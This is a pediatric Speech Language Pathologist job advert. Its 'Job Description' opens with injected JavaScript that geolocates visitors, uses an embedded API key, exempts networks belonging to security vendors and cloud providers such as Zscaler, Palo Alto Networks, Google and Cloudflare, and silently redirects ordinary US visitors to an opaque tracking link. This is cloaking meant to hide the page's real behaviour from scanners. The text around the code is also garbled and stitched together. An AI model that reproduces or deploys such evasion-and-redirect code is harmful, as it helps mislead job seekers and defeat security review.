Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/016c169c80fc49b7/b01b28bc384115857324eb7e3028bda54c573553587ccc4e733a6e08ef98c830/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });*$4,000 Sign-On Bonus!!*
We are seeking a full-time Speech Language Pathologist to help improve communication and feeding skills in pediatric patients, especially children. Your role includes conducting assessments, developing personalized treatment plans, implementing evidence-based therapy techniques, and collaborating with families and educators. You will provide early intervention, educate families, and stay current with best practices.
**Qualifications:** Master’s in Speech Language Pathology, valid licensure, and knowledge of anatomy related to speech and feeding. Experience with pediatrics and medical terminology is preferred.
**Ideal Candidate:** Passionate, collaborative, humble, and dedicated to supporting clients and families.
**Benefits:** Competitive hourly pay (from $35/hr), health/dental/vision insurance, 401(k) with matching, continuing education, paid time off, family bonus, and more. Enjoy a supportive environment focused on professional growth and well-being.